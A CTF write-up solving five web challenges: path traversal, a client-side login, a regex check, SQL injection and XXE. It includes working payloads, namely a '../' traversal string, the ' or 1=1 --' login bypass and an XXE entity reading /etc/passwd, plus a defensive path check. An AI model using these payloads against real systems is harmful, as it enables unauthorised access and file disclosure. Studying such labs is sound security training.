
Problem - Difficulty

Forbidden paths - Medium
Login - Medium
Match the regex - Medium
More sqli - Medium
Soap - Medium

1

Forbidden Paths

Description

Can you get the flag? We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt but the website is filtering absolute file paths. Can you get past the filter to read the flag? Here's the website.

It seems like the page was built to read files, so my first thought was path traversal: the filter only blocks absolute paths, so I tried reading ../../../../../flag.txt

easy solve 😄
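As an added defender's note (not part of the original writeup): the bug is that the filter only rejects paths starting with "/", which does nothing against "..". The check below resolves the requested path under the web root from the challenge description and rejects anything that escapes it; the filter logic is my assumption about the challenge, and the function names are mine.

```python
import os
from typing import Optional

# Web root taken from the challenge description.
WEB_ROOT = "/usr/share/nginx/html"


def weak_filter_allows(user_path: str) -> bool:
    """Assumed behaviour of the challenge's filter: it only blocks absolute
    paths, so a relative traversal string such as ../../flag.txt passes."""
    return not user_path.startswith("/")


def resolve_within_root(user_path: str, root: str = WEB_ROOT) -> Optional[str]:
    """Return the canonical on-disk path if it stays under root, else None.

    Joining then calling realpath collapses every '..' segment (and follows
    symlinks), so a traversal string resolves to a location outside root.
    commonpath is used instead of startswith so that a sibling directory
    like /usr/share/nginx/html_backup is not mistaken for the root itself.
    """
    if os.path.isabs(user_path):
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, user_path))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


if __name__ == "__main__":
    for p in ["index.html", "../../../../../flag.txt", "../html_backup/x", "/flag.txt"]:
        print(f"{p!r}: weak filter allows={weak_filter_allows(p)}, "
              f"resolved={resolve_within_root(p)}")
```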

2

Login

When enumerating the page source I found something interesting:

(async () => {
  await new Promise((e) => window.addEventListener("load", e));
  document.querySelector("form").addEventListener("submit", (e) => {
    e.preventDefault();
    const r = { u: "input[name=username]", p: "input[name=password]" }, t = {};
    for (const e in r)
      t[e] = btoa(document.querySelector(r[e]).value).replace(/=/g, "");
    return "YWRtaW4" !== t.u
      ? alert("Incorrect Username")
      : "cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ" !== t.p
      ? alert("Incorrect Password")
      : void alert(`Correct Password! Your flag is ${atob(t.p)}.`);
  });
})();

You can see that the login check runs entirely in the browser: it compares the base64 of the username against YWRtaW4, which decodes to admin, and the base64 of the password against a second hard-coded string, which atob() turns into the flag.

After decoding the username and password we can log in and get the flag 👍

3

Match the regex

After enumerating the page source code

we found a function that just so happens to have a suspicious comment. I'm pretty sure that means we can submit anything that starts with p, has any character per dot, and ends with F.

easily solved 😄

4

More sqli

When I try to log in with random creds

the website actually shows the SQL query it ran, so this challenge becomes very easy!

we can just use

' or 1=1 --

to bypass the login

the challenge is not over yet!

We got another website now, where could that flag be 🤔

anything familiar?

Yup, we solved the challenge very easily 😎

5

Soap

While casually playing around with the website I found something interesting:

the website seems to accept XML. After reading up on XML I suspected that it might be vulnerable to XXE injection, so I sent a document with an external entity pointing at a local file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <ID>&xxe;</ID>
</data>

Solved the challenge easily again 😆
